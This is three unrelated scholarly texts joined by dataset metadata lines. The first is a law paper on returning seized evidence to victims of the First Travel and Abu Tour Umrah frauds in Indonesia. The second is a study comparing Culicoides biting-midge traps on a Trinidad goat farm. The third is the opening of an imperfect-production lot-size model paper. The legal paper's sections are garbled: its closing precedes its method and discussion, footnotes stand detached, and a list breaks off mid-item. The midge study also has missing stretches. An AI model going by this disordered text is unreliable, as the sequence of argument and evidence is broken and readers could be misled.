Starting from the implementation of the judge's decision regarding the status of confiscated evidence, as described above, it can be seen that the judge's decision has not yet provided justice and legal certainty for victims who have suffered losses due to criminal acts. Therefore, various efforts are needed to return confiscated evidence in criminal cases so as not to cause losses to the victims. These efforts include the following. The process of evidence seizure and documentation must be clearly and explicitly recorded, including for evidence related to bankruptcy seizures. This documentation is the basis for the Public Prosecutor in creating case files, ensuring that the evidence used in the case is clear and detailed from the investigation process through the court proceedings. This is in line with Article 46 paragraph (2) of the Criminal Procedure Code (KUHAP), which aims to protect the rights of the owner or the person entitled to property that is in the possession of the suspect/defendant and has been seized for the purposes of the criminal case.
In the context of victims, they can take action through the mechanisms provided in Articles 98 and 99 of the KUHAP. According to these provisions, if the accused's actions cause losses to others, the aggrieved party can request that the Chief Judge join the compensation claim to the ongoing criminal trial. This provision also applies to victims who have suffered losses due to a criminal act. Such a request can be submitted at the latest before the public prosecutor reads the indictment or, in the absence of the public prosecutor, before the judge delivers the verdict. If the judge accepts the compensation claim, the amount of compensation will be determined in the judgment. In practice, this mechanism is rarely used by victims, and there is a lack of detailed rules governing the process of joining compensation claims, so public prosecutors often do not provide victims with the opportunity to file claims and gather evidence of their losses.
In reality, the compensation claim mechanism also serves the objectives of the law: it not only acts as a deterrent to criminal offenders but also provides protection to victims through compensation. The principles of victim protection and recovery are now emphasized in criminal law, particularly in the context of restorative justice. The First Travel case can serve as a lesson in the effort to apply a restorative justice approach to criminal acts that clearly result in financial losses to the victims. If only the public prosecutor had informed the victims about the provisions of Article 98 of the Criminal Procedure Code (KUHAP) and encouraged them to request consolidation before the judge, it is highly likely that the proceeds from the auction of First Travel's seized assets would have been prioritized to compensate the victims rather than being handed over to the state.23

From the perspective of the Public Prosecutor, efforts can be made through the mechanism outlined in the Attorney General's Regulation (Perja) No. 27 of 2014, in conjunction with Attorney General's Regulation (Perja) No. 9 of 2019 concerning Asset Recovery Guidelines. In essence, these regulations provide guidelines for asset recovery activities conducted by the Prosecutor's Office through the Center for Asset Recovery (Pusat Pemulihan Aset, PPA). These provisions specify that one of the asset recovery activities is the return of assets to victims or rightful claimants, which includes victims of crimes.24 To facilitate this process, prosecutors must demand the return of assets seized from the perpetrator to the victim, explicitly identifying the party entitled to receive the returned assets. This should be accompanied by evidence of ownership, including written evidence and witness testimony establishing the victim's ownership of the seized property. Within 7 days of a court decision obtaining permanent legal force, the prosecutor must return the assets/seized property to the victim or rightful claimant based on an order from the Chief of the Prosecutor's Office.25

In the development of the First Travel case, the convicted parties, Andika Surachman, Anniesa Hasibuan, and Kiki Hasibuan, alias Siti Nuraida Hasibuan, filed an extraordinary legal remedy in the form of a Judicial Review (Peninjauan Kembali, PK). The Supreme Court has issued a decision regarding this judicial review, as seen in Decision No. 365 PK/Pid.Sus/2022. Regarding the judge's considerations related to the status of evidence, the Judicial Review Panel disagreed with the original verdict in part, specifically regarding evidence in the form of money in bank accounts and economically valuable assets, which had been confiscated for the state, because in this particular case no rights of the state had been harmed. Based on these considerations, the decision of the Judicial Review Panel states that, as these items of evidence originated from prospective Umrah pilgrims, they must be returned to the rightful owners of the evidence, namely the prospective Umrah pilgrims who made payments to PT First Travel, as well as subcontractors whose rights have not been paid by the Petitioners through PT First Travel, with the payment mechanism entrusted to the executor.
The decision of the Judicial Review, including its implications for the status of evidence, does not provide a definitive solution to the issue of evidence status. The absence of a time limit for filing a Judicial Review, coupled with the possibility that a legally binding verdict is executed before the Judicial Review takes place, creates numerous complications concerning the quantity of assets and the connection to bankruptcy seizures in the return of evidence. Therefore, the primary focus should remain on the judge's considerations, especially at the judex facti level, to ensure that the status of the evidence is determined accurately and meticulously on the basis of clear factual information.
CLOSING
In Decision Number 3096 K/Pid.Sus/2018, the judge's considerations, one of the most crucial aspects in determining the value of a judge's decision, particularly regarding the status of evidence subject to seizure and its intersection with bankruptcy seizure, were not conducted meticulously or thoroughly and did not take into account the losses suffered by victims of the criminal acts. Consequently, the evidence became state-seized property.
In contrast, in Case No. 3127 K/Pid.Sus/2019, the judge did not provide any considerations but merely stated in the verdict that the seized items should be returned to the curator. While this second verdict did take the bankruptcy seizure into account, the absence of the judge's considerations leaves the decision without a guarantee of legal certainty regarding the restitution of the losses suffered by victims of the criminal acts. The existence of a judge's decision at the Judicial Review stage concerning the status of evidence can also pose various challenges for the Public Prosecutor as the executor of the verdict.
Therefore, various efforts are required to return evidence seized from victims and mitigate the losses experienced. This can be achieved through several means: (1) improving the administrative system for tracing and documenting evidence subject to seizure, starting from the investigative stage, so that case files at the Public Prosecutor's Office are more explicit in classifying the origin and ownership of the evidence, including in cases involving bankruptcy seizures, thereby facilitating and providing certainty to the judge in determining who is entitled to the evidence in question; (2) encouraging an active role on the part of victims through the mechanism provided in Article 98 of the Criminal Procedure Code (KUHAP), upholding the principle of victim protection and recovery in criminal law as part of the emphasis on restorative justice; and (3) optimizing the role and position of prosecutors, in accordance with the Attorney General's Regulations (Perja), in the recovery and return of assets to victims.
The analysis is conducted in the context of the First Travel case, which was filed for Suspension of Debt Payment Obligation (PKPU) on July 25, 2017, in the Central Jakarta Commercial Court under case number 105/Pdt.Sus-PKPU/2017/PN Jkt.Pst and concluded on August 22, 2017; the judgment in the criminal case is found in Decision Number 3096 K/Pid.Sus/2018. Similarly, the case of Abu Tour (Amanah Bersama Umat) was submitted to the Makassar Commercial Court under case number 4/Pdt.Sus-PKPU/2018/PN Mks on September 20, 2018, with the criminal case judgment in Decision Number 3127 K/Pid.Sus/2019. Understanding the application of the judge's decision regarding the status of confiscated evidence is crucial because it plays a vital role in protecting the rights of victims of criminal acts and can provide valuable insights for law enforcement in the resolution of cases, ultimately preventing similar cases, which may employ various modi operandi, in the future.

RESEARCH METHOD

This research is based on normative legal research (doctrinal legal research), which utilizes secondary data sources. To address the research issues, a case approach is employed, focusing on court judgments. The court judgments under scrutiny are Decision Number 3096 K/Pid.Sus/2018 (related to the Suspension of Debt Payment Obligation with case number 105/Pdt.Sus-PKPU/2017/PN Jkt.Pst), analyzed in comparison with Decision Number 3127 K/Pid.Sus/2019 (related to the Suspension of Debt Payment Obligation with case number 4/Pdt.Sus-PKPU/2018/PN Mks). The selection of these judgments is based on the similarities between the cases: both involve the status of confiscated evidence in criminal cases that intersects with bankruptcy confiscation, with the underlying motive being the collection of funds from the public for Umrah pilgrimages.

9 Ibid.
10 Ibid., p. 645.
11 See Article 194 KUHAP jo. Article 197 paragraph (1) KUHAP.

DISCUSSION

Implementation of Evidence Status in Criminal Cases Related to Bankruptcy Confiscation in Judges' Decisions

The definition of evidence in criminal cases pertains to the object of the offense (the object of the crime) and the tools used to commit the offense (the means used to commit the crime), including items that are the result of a crime. Characteristics of items that can become evidence include:12 1. Material Object

1. First Travel Case (Decision Number 3096 K/Pid.Sus/2018)

The First Travel case occurred in 2017 and involved a criminal act of fraud committed by a husband and wife, Andika Surachman and Anniesa Desvitasari Hasibuan, the leaders of PT First Anugerah Karya Wisata (First Travel). They engaged in fraudulent activities by failing to send pilgrims on their scheduled Umrah trips despite having received full payments. The number of victims amounted to 63,310 people, with a total loss of IDR 905.33 billion. Three of the victims, namely Hendarsih, Euis Hilda Ria, and Ananda Perdana Saleh, filed for PKPU (Suspension of Debt Payment Obligations) against PT First Anugerah Karya Wisata (First Travel), a Limited Liability Company engaged in Umrah travel services, as the PKPU Respondent. This was outlined in the decision by the Commercial Court of Central Jakarta Number 105/PDT.SUS-PKPU/2017/PN.Niaga. In summary, the contents of this decision are as follows:
a. Granting the Petitions for Suspension of Debt Payment ("PKPU") submitted by PKPU Petitioner I, PKPU Petitioner II, and PKPU Petitioner III against the PKPU Respondent, PT First Anugerah Karya Wisata, in their entirety;
b. Determining a Temporary Suspension of Debt Payment Obligations (PKPUS) against the PKPU Respondent, PT First Anugerah Karya Wisata, for a maximum period of 45 (forty-five) days from the pronouncement of the aforesaid decision;
c. Appointing a Supervising Judge from the Commercial Court Judges at the Central Jakarta Commercial Court as the Supervising Judge to oversee the PKPU process of the PKPU Respondent;
d. Appointing and commissioning SEXIO YUNI NOOR SIDQI, S.H., ABDILLAH, S.H., and LUSYANA MAHDANIAR, S.H., as Curators, enabling them to act as the Debt Payment Obligation Suspension Process Management Team for the PKPU Respondent, and/or as the Curator Team in the event that the PKPU Respondent is declared bankrupt due to PKPU failure;
e. Instructing the Management Team to summon the PKPU Respondent and known Creditors, by registered mail or through couriers, to appear at the hearing, which must be conducted no later than the 45th (forty-fifth) day from the pronouncement of the Temporary Suspension of Debt Payment Obligation Decision;
f. Charging the case costs to the PKPU Respondent.

In its development, the PKPU process for PT First Anugerah Karya Wisata officially concluded with a peace agreement.14 The Panel of Judges at the Central Jakarta Commercial Court officially issued a peace agreement or homologation decision. The proposal for the peace agreement presented by First Travel consisted of three main provisions: first, First Travel would arrange for the departure of pilgrims for Umrah; second, it would provide refunds to pilgrims who chose not to go; and third, First Travel requested a period of six to twelve months to establish a new management team, which meant that the option of arranging departures could only be realized in 2019, while the refund option could be implemented two years after homologation.

In the case of PT First Travel, a criminal investigation process against the individuals involved was conducted simultaneously, and they received judgments. The Director of First Travel, Andika Surachman, was sentenced to 20 years in prison; the Director of First Travel, Anniesa Hasibuan, also received a 20-year prison sentence; and the Head of the Finance Division, Siti Nuraidah Hasibuan, alias Kiki, was sentenced to 15 years in prison.15 The judgment by the court regarding the determination of the status of evidence in the case of Andika Surachman (Court Decision Number 3096 K/Pid.Sus/2018) remained unchanged at the cassation level, affirming the decision at the appellate level, which in turn upheld the decision at the District Court level. The considerations by the judge regarding the status of evidence in this case were as follows:

a. The pieces of evidence were returned to the individuals whose names were mentioned in the decision.
b. Regarding pieces of evidence numbered 1 to 529, the Appellant in Cassation/Prosecutor, as stated in the cassation memorandum, requested that this evidence be returned to prospective pilgrims of PT First Anugerah Karya Wisata through the Asset Manager of First Travel's Victims, based on Deed Number 1, dated April 16, 2018, made before Notary Mafruchah Mustikawati, S.H., M.Kn., for distribution in a proportional and equitable manner. However, during the trial, it was revealed
that the Asset Manager of First Travel's Victims had sent a letter and a statement rejecting the return of this evidence.
| 2023-12-16T17:15:43.276Z | 2023-11-04T00:00:00.000 | {
"year": 2023,
"sha1": "02f83fe65286603cba1aa0a0e4b14c3990bf9898",
"oa_license": "CCBY",
"oa_url": "https://jurnal.fh.unpad.ac.id/index.php/jbmh/article/download/1446/672",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "9e16772669e31a88c3af3834e38363d27425eb4d",
"s2fieldsofstudy": [
"Law"
],
"extfieldsofstudy": []
} |
249677392 | pes2o/s2orc | v3-fos-license | Comparison of surveillance trapping methods to monitor Culicoides biting midge activity in Trinidad, West Indies
Abstract Culicoides biting midges (Diptera: Ceratopogonidae) are biting nuisances and arbovirus vectors of both public health and veterinary significance in Trinidad. We compared sampling methods to define the behaviour and bionomics of adult Culicoides populations at a commercial dairy goat farm. Three static trap designs were compared: (a) Centers for Disease Control (CDC) downdraft UV trap; (b) CDC trap with an incandescent bulb and (c) CDC trap with a semiochemical lure consisting of R-(−)-1-octen-3-ol and CO2 (no bulb). Sweep netting was used to define diel periodicity. A total of 30,701 biting midges were collected using static traps, dominated by female Culicoides furens (>70% of trap collections across all three designs). There was no significant difference in Margalef's index between the three traps; however, trap designs A and C collected a significantly greater number of individuals than trap B, and trap C yielded the highest species richness. The greatest species richness and abundance of Culicoides collected by sweep net were observed between 6:00 and 6:15 pm, and notable differences in the crepuscular activity patterns of several species were identified. Comparative data on Culicoides species richness, abundance, sex and reproductive status are discussed and can be used to improve surveillance strategies, research designs and risk management.
INTRODUCTION
Trinidad, the larger of the two islands of the Republic of Trinidad and Tobago (T&T), is the southernmost island in the Caribbean archipelago, situated 11 km northeast of the Venezuelan coast (Figure 1). Evidence to date indicates that an abundance and diversity of Culicoides biting midges thrive in the hot and humid climate of both islands (Aitken et al., 1975; Greiner et al., 1989; Tikasingh, 1972). In addition, Trinidad's geographical proximity to the South American mainland facilitates the opportunity for wind-borne introduction of Culicoides (Sellers et al., 1978), providing a potential incursion pathway for Culicoides-borne pathogens from South America. There is also current evidence that Culicoides-borne arboviruses are actively circulating in Trinidad (Brown-Joseph et al., 2017, 2019) and the greater Caribbean region (Anderson et al., 1961; Greiner et al., 1990; Mo et al., 1994; Pinheiro et al., 1981a, 1981b; Tanya et al., 1992).
Culicoides biting midges are tiny haematophagous insects approximately 0.5-3.0 mm in length. Over 1400 species of Culicoides have been identified globally (Borkent & Dominiak, 2020), 46 of which have been recorded in Trinidad (Aitken et al., 1975; Gumms et al., 1984; Tikasingh, 1972). In the Caribbean, Culicoides are biological vectors for viruses that affect animals, such as bluetongue virus (BTV) (Greiner et al., 1990; Mo et al., 1994; Tanya et al., 1992) and epizootic haemorrhagic disease virus (EHDV) (Mo et al., 1994). Brown-Joseph et al. (2017, 2019) recently determined that BTV serotypes 1, 2, 3, 5, 12 and 17, as well as EHDV-6, were co-circulating in Trinidad. In addition to links to arboviruses of veterinary importance, Culicoides are also vectors of human pathogens, including Oropouche orthobunyavirus (OROV) (Anderson et al., 1961; Pinheiro et al., 1981a, 1981b) and the parasite Mansonella ozzardi (Raccurt, 2018). Culicoides species can also be a severe biting nuisance to humans, livestock and equines, which, even in the absence of pathogen transmission, can have a significant impact on tourism, forestry and agriculture (Mellor et al., 2000). Accurately determining the abundance and distribution of vector species of Culicoides feeding on relevant hosts is a critical factor in assessing the risk of Culicoides-borne pathogen transmission according to both region and season. Collections of Culicoides can be made directly from hosts using a range of approaches including drop-trapping (Purse et al., 2015), traps attached to hosts (Viennet et al., 2011), or sweep netting (Meiswinkel & Elbers, 2016). These techniques, however, are labour intensive, logistically challenging and not suitable for large-scale surveillance activities (Melville et al., 2015). Due to these limitations, a broad range of static and more easily deployable traps have been developed that aim to characterize potential vector species richness and abundance. In surveillance activities, the majority of these traps use attractants such as an artificial light source and/or a semiochemical bait that mimics host odour, combined with a source of suction to collect flying insects.
The diversification in trap designs used for surveying Culicoides populations presents a challenge in interpreting abundance and diversity data between regions, countries and research groups (McDermott & Lysyk, 2020). Variation arises according to the trap design itself, including its size, suction, light source and the type of attractant used (Harrup et al., 2016; Venter et al., 2015).
Recent studies comparing surveillance approaches for Culicoides in the Caribbean and South America are rare, despite the biting midge's noted importance as an arbovirus vector and a biting nuisance in the region. Studies carried out roughly 40 years ago in Trinidad and Tobago used various types of insect traps. A study carried out by Tikasingh (1972) collected several species, including C. diabolocus Aitken et al., 1975, C. foxi Ortiz 1951, C. furens Poey 1853 and C. pusillus Lutz 1913. Trapping sites for this study included dense forest, where vertical stratification was observed: the predominant species in that study, C. diabolocus, was trapped mostly in the forest canopy.
A second study, carried out by Aitken et al. (1975), set out to identify the Culicoides spp. present in Trinidad. Incandescent light-suction traps (both New Jersey and CDC models), sweep nets using human bait, Shannon traps, larval collections and emergence traps designed to collect adult Culicoides emerging from larval development material were used. This study identified 45 Culicoides biting midge species by morphology (wing, mesonotum and leg-band patterns, antennal ratios, palpal ratios, proboscis-to-head ratios, distribution of macrotrichia and sensoria, etc.). These morphological features were extensively documented to generate the biological keys used to identify the Culicoides species in the present study.
The primary objective of this study was to compare the trapping capabilities of commercially available CDC light-suction insect traps fitted with either an ultraviolet (UV) light bulb, an incandescent (white) light bulb, or a semiochemical lure consisting of R-(−)-1-octen-3-ol and carbon dioxide (CO2) supplied by sublimating dry ice (with the light bulb removed from the CDC light-suction trap). Their effectiveness in relation to specimen yield, species variety, sex ratios and female reproductive status was measured and compared. Sweep net collections were also compared against the three static traps. The secondary aim was to discern the crepuscular activity patterns of the Culicoides species identified from the sweep net catches.
Study location
This study was conducted at a small commercial dairy goat farm. It is worth noting that the Jarvis Dairy Goat Farm is the only 'no kill' farm in Trinidad that allows the animals to live out their natural lives on the farm. Location 1 was above thick vegetation, with the trap hung from the branch of a tree with dense foliage, amidst high grass and above damp leaf litter. Location 2 was sited close to cultivated land, with the trap hung from a citrus tree (no flowers or fruits present) above exposed loamy topsoil, adjacent to cultivated agricultural beds with little to no leaf litter. Location 3 was above a concrete slab extension.
Identification of Culicoides specimens
For samples collected using the traps and the sweep net, Culicoides were separated from other arthropods (bycatch) and identified, where possible, to species level by morphology using a biological identification key (Aitken et al., 1975). Specimens of the morphologically cryptic subgenus Hoffmania Fox that were not discernible to their exact group (hylas or guttatus) or species were identified to subgenus level only. The species, sex and reproductive status of female specimens (nulliparous/non-pigmented; blood fed; gravid; parous/pigmented) were recorded for all Culicoides collected.
FIGURE 2: Plan drawing of the dairy goat farm (not drawn to scale) showing the fixed locations (triangles 1, 2 and 3) where each of the three traps was placed overnight for nine nights: location 1 was amid dense trees and underbrush; location 2 was under a lime tree adjacent to cultivated soil; and location 3 was over an exposed concrete slab. The red arrows starting at the yellow X show the set path taken to sweep net around the goat shed on four separate evenings for the last 2 h of daylight. See Figures S1 and S2 for photos.
Comparison of Culicoides species richness with respect to trap attractant and location
The number of Culicoides species (i.e., the species richness/variety) collected by the three trap types was compared using Margalef's index, such that Margalef's index = (S − 1)/ln N, where S is the total number of species collected in a sample (i.e., one trap collection), N is the total number of individuals in the sample and ln is the natural logarithm (Margalef, 1958). Margalef's index was also calculated to compare the species richness among the three different environments found at the three set positions (locations 1-3).
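For illustration, Margalef's index is straightforward to compute; the sketch below is our own minimal Python example with hypothetical species counts, not data from this study:

```python
import math

def margalef_index(counts):
    """Margalef's richness index: (S - 1) / ln(N), where S is the
    number of species and N the total number of individuals."""
    counts = [c for c in counts if c > 0]
    S = len(counts)   # species richness of the sample
    N = sum(counts)   # total individuals in the sample
    if N <= 1:
        raise ValueError("need more than one individual")
    return (S - 1) / math.log(N)

# Hypothetical trap collection: individuals per species
print(margalef_index([520, 31, 7, 2]))  # ~0.47 for 4 species, 560 midges
```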
To investigate the effect of trap type on the number of Culicoides and the species distribution, generalized linear mixed models (GLMMs) with a binomial error distribution and a logit link function were implemented in a Bayesian setting using the bglmer function in package 'blme' v. 1.0-2 (Dorie, 2014). The GLMMs were fitted by maximum likelihood with the Laplace approximation, with flat covariance priors and normal fixed priors; day of collection was included as a random effect, and trap type and trap location were considered as potential additional fixed predictors. Final models were obtained using a backwards-stepwise-selection procedure (Zeileis et al., 2008), such that variables that did not contribute significantly to explaining variation in trap catch were successively eliminated on the basis of the Bayesian information criterion (BIC) (Schwarz, 1978), until the removal of a variable caused an increase in BIC of two or more. Differences in trap catch size between trap types were then assessed using Tukey's all-pair comparisons with the 'glht' function in package multcomp version 1.4-8.
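The selection logic can be illustrated in a simplified form. The Python sketch below is our own rough analogue, not the authors' R workflow: it uses a fixed-effects Poisson GLM on randomly generated data (no random day effect, no Bayesian priors), purely to show the BIC-based backwards-elimination rule described above:

```python
import numpy as np
import pandas as pd
import statsmodels.api as sm
import statsmodels.formula.api as smf

rng = np.random.default_rng(1)
# Hypothetical nightly catches: 9 nights x 3 traps x 3 locations
df = pd.DataFrame({
    "count": rng.poisson(40, 81),
    "trap": np.tile(["A", "B", "C"], 27),
    "location": np.tile(np.repeat(["1", "2", "3"], 3), 9),
})

def fit_bic(terms):
    rhs = " + ".join(terms) if terms else "1"
    res = smf.glm(f"count ~ {rhs}", df, family=sm.families.Poisson()).fit()
    k = res.df_model + 1                       # parameters incl. intercept
    return res, k * np.log(res.nobs) - 2 * res.llf

terms = ["trap", "location"]
model, current_bic = fit_bic(terms)
improved = True
while improved and terms:
    improved = False
    for t in list(terms):
        cand, cand_bic = fit_bic([x for x in terms if x != t])
        # Drop the term only if its removal does NOT raise BIC by >= 2
        if cand_bic < current_bic + 2:
            terms.remove(t)
            model, current_bic = cand, cand_bic
            improved = True
            break
print("retained terms:", terms)
```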
In addition, linear and polynomial regression models in the 'stats' v. 3.5.0 package (R Development Core Team, 2018) were utilized to visualize the activity profile of Culicoides and of selected Culicoides species collected by sweep netting, with time of collection, or a quadratic function of time of collection, considered as a fixed predictor. Both the Akaike information criterion (AIC) (Akaike, 1973), using the function 'AIC' in the 'stats' v. 3.5.0 package (R Development Core Team, 2018), and Wald tests, using the function 'waldtest' in the 'lmtest' v. 0.9-36 package (Zeileis & Hothorn, 2002), were utilized to assess model fit with and without the quadratic term.
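A minimal illustration of comparing a linear against a quadratic activity profile by AIC follows; the interval counts are hypothetical, not the study's data:

```python
import numpy as np
import statsmodels.api as sm

# Hypothetical sweep-net counts at 15-min intervals (4:15-6:15 pm)
t = np.arange(9, dtype=float)   # interval index
y = np.array([3, 4, 6, 9, 11, 16, 22, 30, 41], dtype=float)

lin = sm.OLS(y, sm.add_constant(t)).fit()
quad = sm.OLS(y, sm.add_constant(np.column_stack([t, t**2]))).fit()

# The lower AIC indicates the better-fitting activity profile
print(f"linear AIC = {lin.aic:.1f}, quadratic AIC = {quad.aic:.1f}")
```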
Comparison of trap attractants
A total of 30,701 Culicoides specimens were collected over the nine nights of trapping (Table 1). Female Culicoides dominated trap collections (96.33%; n = 29,594), with 26.73 females collected for every male Culicoides.
It is also notable that the mechanical sweep net method yielded a relatively high proportion of males (9.93%; n = 95) when compared to the static traps (Table 4).
In addition, morphologically cryptic specimens from the subgenus Hoffmania were collected (Table S4).
Comparison of crepuscular Culicoides activity by sweep net collection
Female Culicoides also dominated the sweep net collections (90.15%; n = 879), where the majority (83%; n = 730) were non-pigmented, 9.7% (n = 85) were pigmented and 5.8% (n = 51) were blood fed. The reproductive status of the remaining 1.5% (n = 13) was undetermined. No gravid females were collected using the sweep net method. However, it was noted that the relative proportion of blood-fed females collected using the sweep net (5.8%; 51 out of 879 total) was ~23 times higher than the relative proportion of blood-fed females (0.25%; n = 72) collected by all three traps with attractants (A, B and C) combined (n = 29,217) (Figure S3).
Linear and polynomial regression analyses revealed that the mean number of Culicoides collected using the sweep net increased as daylight intensity decreased with time (Figure 6). No significant differences were observed between the numbers of males and females active at each time point (Table 4). The number of Culicoides species (i.e., species richness) collected during each sweep net collection interval ranged from two to four, with C. furens and C. pusillus present throughout the entire 2-h collection periods. The highest species richness (four different species) occurred between 6:00 and 6:15 PM (Figure S3). Of the two species that dominated the sweep net collections, C. pusillus activity gradually increased and peaked at 5:30 PM, whereas C. furens activity increased continually with the approaching sunset up to 6:15 PM (Figure 5). It was also noted that C. aitkeni consistently appeared from 5:00 PM onwards on all four nights of trapping, despite trapping starting at 4:15 PM (Figure 4). The overall Margalef's index for the sweep net method was 0.872, which indicated that the species richness (Margalef's index) derived from this mechanical trapping method was notably higher than that for traps A, B and C with attractants (Table 2).
DISCUSSION
This study compared the effectiveness of three static traps using different wavelengths of light (UV vs. incandescent light) and a semiochemical lure ((R)-(−)-1-octen-3-ol/CO2) as attractants. The surveillance (trapping) capabilities of the static traps were compared to a mechanical (sweep net) trapping method in relation to Culicoides specimen yield, sex, reproductive status and species richness, unlike in earlier trapping studies carried out in Trinidad (Aitken et al., 1975; Tikasingh, 1972).
Trap efficiency and feasibility for surveillance activities
Traps A (UV light) and C (semiochemical lure [(R)-(−)-1-octen-3-ol/CO2]) were significantly more efficient than trap B (incandescent light) in catching large numbers of Culicoides, collecting as much as 25 and 174 times more Culicoides specimens, respectively, than trap B. This observation is consistent with previous studies that compared incandescent to UV light traps (Venter et al., 2006) and UV light traps to semiochemical traps. It should, however, be noted that the number of specimens collected was skewed by the high numbers of C. furens caught with the semiochemical trap (C) located near cultivated mulberry bush beds. Culicoides furens is not a known vector species, although it is responsible for high levels of nuisance biting.
However, C. furens is an autogenous species with a very wide host range, which may explain why it was present in such high numbers on the farm.
The observation that traps A (UV light) and B (incandescent light) had relatively high proportions of (non-Culicoides) bycatch, whereas trap C (semiochemical lure [(R)-(−)-1-octen-3-ol/CO2]) exclusively trapped Culicoides females, was not surprising, since haematophagous Culicoides locate their hosts primarily through olfaction and the detection of body heat (Mands et al., 2004; Scheffer et al., 2012; Venter et al., 2011). High proportions of bycatch in collections, as seen with the light-baited traps (A and B), will increase the time and labour requirements when planning Culicoides trapping.

Table note: Total males:females caught in each location are also presented. The trap type that collected the majority of each species at the respective location is given in parentheses. Species richness of the three locations was assessed using Margalef's index = (S − 1)/ln N, where S is the total number of species collected at the location, N is the total number of individuals collected there and ln is the natural logarithm (Margalef, 1958).
Therefore, using traps with very little to no bycatch, like trap C (semiochemical lure [(R)-(−)-1-octen-3-ol/CO2]), will help to minimize the potential drain on restricted labour resources. This benefit may, however, be offset by the high cost and impermanence of semiochemical lures, so this approach will not be suited to projects/studies with relatively long timelines and/or low budgets, as is the case with most Culicoides surveillance programmes.

Culicoides furens, which is primarily known to breed in salt marshes and mangrove swamps (Tikasingh, 1972), dominated trap collections (90.9%) and sweep net collections at the same site (88%), which is consistent with previous studies conducted in Trinidad (Tikasingh, 1972) and in the Southeast USA (Breidenbaugh et al., 2009).
The predominance of C. furens on the farm is most likely due to the proximity of the brackish marshland, only 0.1 km away, a favourable habitat for this species. The adjacent South Oropouche Swamp is located where the freshwater of the South Oropouche River mixes with saltwater as it empties into the Gulf of Paria. Although C. furens is not a vector species for any known viruses or parasites, it is well documented as a nuisance species in several tourism-dependent countries (Aitken et al., 1975) and was indeed a source of distress to the animals on the farm.
Culicoides guyanensis is also known to breed in salt-water marshes (Aitken et al., 1975); however, its abundance was very low in the trap collections by contrast to C. furens. Although C. guyanensis has been collected throughout the year in Trinidad (Brown-Joseph et al., unpublished data), the peak abundance for this species is at the start of the rainy season in May, by contrast to C. furens which is most abundant in the dry season starting in February, when this study was conducted (Aitken et al., 1975). Tikasingh (1972) also found C. pusillus to be primarily present in the rainy season, with peak abundance from June to August, which may explain its relative low abundance during this study. There is little to no information on the relative seasonality of the other species collected in this study (C. aitkeni, C. foxi, C. insignis, C. insinuatus and C. ocumarensis) and how this may have impacted their relative abundance.
Identification of Culicoides vector species
The identification of the vector species found in a particular location/region is of high importance when conducting surveillance studies. In order to gain a full understanding of the epidemiology of vector-borne disease, and to aid in predicting timelines for potential outbreaks, it is important to understand the preferred habitat and the seasonal abundance throughout the year of the vector species in question.
Although C. furens and C. guyanensis are not considered vector species, C. insignis and C. pusillus are. It has been established that C. insignis is a competent vector for both BTV and EHDV (McGregor et al., 2021). BTV (serotype 3) has also been isolated from C. pusillus females in Jamaica, identifying C. pusillus as a potential vector species for BTV. So, despite the low numbers trapped in this study, two vector species for BTV and EHDV were identified on the goat farm, indicating a possible route of transmission for these two viruses among the goats on the farm. Confirmation of this via group-specific real-time PCR for BTV and EHDV was outside the scope of this particular study.
Trap collections: temporal activity
The majority of Culicoides species exhibit a crepuscular peak in activity (Meiswinkel & Elbers, 2016; Mellor et al., 2000; Sanders et al., 2012); however, twilight is a period when light-suction traps will likely exhibit decreased efficacy due to the competition between their light source acting as an attractant and the residual daylight in the environment. Trinidad's close proximity to the equator (~10° north) means that the twilight period is fairly short (~45 min) and consistent throughout the year, making it easier to discern trends in Culicoides activity. Although the peak activity of all the collected species occurred in the time intervals nearest sunset, as expected, it was noted that one particular species, C. aitkeni, exhibited more specifically diurnal activity, indicating a potential for light-suction traps to underestimate or even miss such species in their collections.
SUPPORTING INFORMATION
Additional supporting information may be found in the online version of the article at the publisher's website.
| 2022-06-16T06:16:18.757Z | 2022-06-15T00:00:00.000 | {
"year": 2022,
"sha1": "bf762ae7f1e579372f5d37bca8f93287522c16eb",
"oa_license": null,
"oa_url": null,
"oa_status": "CLOSED",
"pdf_src": "Wiley",
"pdf_hash": "5b48465fa58a86d2c36f3133769fcb6105fedfec",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
53473873 | pes2o/s2orc | v3-fos-license | An Economic Production Model with Flexibility
This paper develops a model to determine the optimal reliability and production rate that achieve the largest total integrated profit for an imperfect production process under allowable shortage. In this system, the production facility may shift from an 'in-control' state to an 'out-of-control' state at any random time. The basic assumption of the classical EPL model is that 100% of the product is of perfect quality, but in practice this is not true. More specifically, this paper extends the work of Sana (S.S. Sana, 2010, An economic production lot size model in an imperfect production system, European Journal of Operational Research 201, 158-170). Here we consider two types of production process within a cycle time: the first is the 'in-control' state at the start of production, which yields conforming-quality items; the second is the 'out-of-control' state, reached after a certain time owing to a higher production rate and longer production-run time. The proposed model is formulated assuming that a certain percentage of the total product, described by a function, is defective. The imperfect-quality items are reworked at a cost to restore their quality to the original one. The total cost function is illustrated by numerical examples, and a sensitivity analysis is carried out.
Introduction
It is generally admitted that inventory management is affected by the imperfect quality of goods, and this aspect has to be taken into account. In the last few decades, the development of inventory control models and their uses have been popularized by academicians as well as industries. However, one of the weaknesses of current inventory models is the unrealistic assumption that all items produced are of good quality. In the classical economic production lot size (EPL) model, the production rate of a machine is assumed to be predetermined and inflexible (Hax and Candea, 1984). However, the production rate can be easily changed (Schweitzer and Seidmann, 1991); in other words, the production rate should in many cases be treated as a decision variable. Empirical observations indicate that as the machine production rate is increased, tool or die costs increase (Drozda and Wick, 1987). The treatment of the production rate as a decision variable is especially appropriate for automated technologies that possess volume flexibility. Volume flexibility of a manufacturing system is defined as its ability to be operated profitably at different overall output levels. Volume flexibility permits a manufacturing system to adjust production upwards or downwards within wide limits prior to the start of production of a lot. It is a major component of a Flexible Manufacturing System (FMS), and it helps to reduce the rate of production in order to avoid rapid accumulation of inventories and non-conforming (defective) items. Advances in computer science have contributed to the development of volume-flexible manufacturing systems. In modern automobile industries, computer-controlled machines have been introduced to increase productivity and product quality; the speed of production at such machines is controlled by a computer. It is reasonable that an increasing rate of production increases the probability of component (machinery parts, labour, etc.) failure, and thus the number of non-conforming items increases. Generally, the percentage of defective items increases with increases in the production rate and the production-run time, because almost all machinery systems may undergo malfunction or unsatisfactory performance after some time, and these effects grow with time. At the start of production, the process is in the 'in-control' state and the items produced are of conforming quality. After some time, it may shift to an 'out-of-control' state while in process, thereby resulting in the production of non-conforming-quality items.
